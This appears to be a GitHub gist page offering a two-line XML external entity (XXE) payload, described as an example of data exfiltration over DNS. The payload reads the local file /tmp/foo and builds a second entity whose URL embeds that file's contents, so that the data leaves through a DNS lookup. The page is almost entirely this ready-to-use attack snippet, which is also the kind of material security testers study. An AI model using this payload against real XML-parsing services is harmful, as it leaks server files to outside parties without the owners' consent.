Skip to content

Instantly share code, notes, and snippets.

Created May 16, 2018 17:27
What would you like to do?
Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!
<!ENTITY % data SYSTEM "file:///tmp/foo">
<!ENTITY % url "<!ENTITY &#x25; exfil SYSTEM 'http://%data;'>">
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment